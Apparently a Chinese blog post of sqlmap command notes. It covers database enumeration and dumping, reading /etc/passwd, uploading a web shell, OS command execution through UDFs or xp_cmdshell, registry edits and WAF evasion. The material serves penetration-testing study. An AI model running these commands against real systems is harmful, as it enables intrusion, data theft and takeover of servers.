Enumeration【数据枚举】
–privileges -U username【CU 当前账号】
-D dvwa -T users -C user --columns 【指定数据库,表,列】
–exclude-sysdbs 【排除系统层的库】
#查具体数据 【前提:当前数据库用户有权读取information_schema库】
–schema --batch --exclude-sysdbs 元数据【–batch:批处理,使用默认选项,直接出结果】
–count 【计数】
Dump数据
–dump, -C, -T, -D, --start, --stop
–dump-all --exclude-sysdbs
–sql-query “select * from users” 【前提:已查询得知数据库的表和列;自定义SQL查询语句】
Brute force【当无权限访问information_schema,使用暴力破解】
须知
1、Mysql < 5.0 , 没有 information_schema 库
2、Mysql >= 5.0 但无权读取information_schema 库
3、使用的是微软的access数据库,默认无权读取MSysObjects
–common-columns (Acess系统表无列信息) 【若不指定列,默认为当前列】
UDF injection【自定义参数注入,属于高级注入
编译共享库创建并上传至DB Sever,以此生成UDF实现高级注入
上传文件格式:Linux:shared object Windows:DLL
***File system【文件系统的访问】***
–file-read="/etc/passwd"
–file-write=“shell.php” --file-dest “/tmp/shell.php” 【注入文件必须存放在当前目录;上传存放的目标目录】
#默认存储在:.sqlmap/output
OS 【操作系统的访问】
LINUX系统:Mysql、postgresql
上传共享库并生成sys_exec()、sys_eval()两个UDF
Windows系统:Mssql
利用xp_cmdshel存储过程(有就用,禁就启,没就建)
–sql-shell 【SQL的shell】
Windows Registry 【windows系统注册表 前提:当前用户有权限对注册表进行操作】
–reg-read
–reg-add
–reg-del
–reg-key、–reg-value、–reg-data、–reg-type
例如:sqlmap –u=“http://1.1.1.1/a.aspx?id=1” --reg-add --reg-key=“HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap” --reg-value=Test --reg-type=REG_SZ --reg-data=1
General 【一般性函数】
-s:修改sqlite会话文件保存位置
默认:.sqlmap/output
-t:修改记录流量文件保存位置
默认:.sqlmap/output
–charset:强制字符编码
–charset=GBK
–crawl:指定从起始位置爬网深度
–batch --crawl=3
–csv-del:指定其他分割符 【dump数据 默认存于” ,”分割的CSV文件】
–csv-del=";"
–dbms-cred:指定数据库账号【前提:有数据库管理系统的账号密码】
#查过的数据都保存在Session中
–flush-session:清空Session 【当我们再次查询相同站点的查询,其查询内容为前一次保存的Session数据】
–force-ssl:针对https网站进行查询
–fresh-queries:忽略Session查询结果
–hex:以十六进制(原数据)形式dump非ASCII字符内容,收到后解码还原,只是作用于通道
sqlmap -u “http:///s.php?id=1” --hex -v 3
–output-dir=/tmp 【指定输出数据的目录】
–parse-errors: 分析和现实数据库内建报错信息,来判断漏洞
sqlmap.py -u “http:///sqlmap/a.asp?id=” --parse-errors
–save:将命令保存成配置文件,指定保存位置 【】
Miscellaneous 【杂项】
-z:参数助记符 【可简写,参数写成参数集合】
如:sqlmap --batch --random-agent --ignore-proxy --technique=BEU -u “1.1.1.1/a.asp?id=1”
sqlmap -z “bat,random,ign,tec=BEU” -u “1.1.1.1/a.asp?id=1”
–answer:设定不同的问题的参数【类似–batch】
sqlmap -u “http:///a.php?id=1” --technique=E --anser=“extending=N” --batch
–check-waf:检测WAF/IPS/IDS
–hpp:HTTP parameter pollution 【本质,WEB上的一个漏洞】
绕过WAF/IPS/IDS的有效方法
尤其对ASP/IIS和ASP.NET/IIS
–identity-waf:彻底的waf/ips/ids检查 【因为有些WAF只过滤第一次出现的username】
支持30多种产品
–mobile:模拟智能手机设备
–purge-output:清除output文件夹
–smart:当有大量检测目标时,只选择基于错误的检测结果
–wizard:向导
447
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
